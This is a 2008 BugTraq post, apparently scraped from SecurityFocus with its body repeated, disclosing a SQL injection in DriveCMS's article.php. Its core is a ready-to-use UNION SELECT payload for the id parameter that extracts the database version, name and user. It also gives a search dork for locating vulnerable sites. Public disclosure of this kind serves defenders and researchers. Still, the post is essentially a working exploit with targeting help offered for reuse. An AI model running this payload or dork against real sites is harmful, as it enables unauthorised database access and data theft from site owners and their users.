BugTraq
Back to list
|
Post reply
DriveCMS article.php remote sql injection
Nov 02 2008 09:11AM
beenudel1986 gmail com
################################################################
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986 (at) gmail (dot) com [email concealed]
#
# Share the c0de!
#
################################################################
#
# Title: DriveCMS Article.php Sql Injection
#
# Vendor: http://drivecms.com
#
#
###########################################################
#
# d0rk:Powered by DriveCMS
#
###########################################################
Live Demo:
payload: /article.php?id=-1+union+select+1,concat(version(),0x3a,database(),0x3a,
user()),3,4,5,6,7,8,9.10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33--
Column number can be diffrent too
###########################################################
#
# Bug discovered : 02 Nov.2008
###########################################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986 (at) gmail (dot) com [email concealed]
#
# Share the c0de!
#
################################################################
#
# Title: DriveCMS Article.php Sql Injection
#
# Vendor: http://drivecms.com
#
#
###########################################################
#
# d0rk:Powered by DriveCMS
#
###########################################################
Live Demo:
payload: /article.php?id=-1+union+select+1,concat(version(),0x3a,database(),0x3a,
user()),3,4,5,6,7,8,9.10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33--
Column number can be diffrent too
###########################################################
#
# Bug discovered : 02 Nov.2008
###########################################################
[ reply ]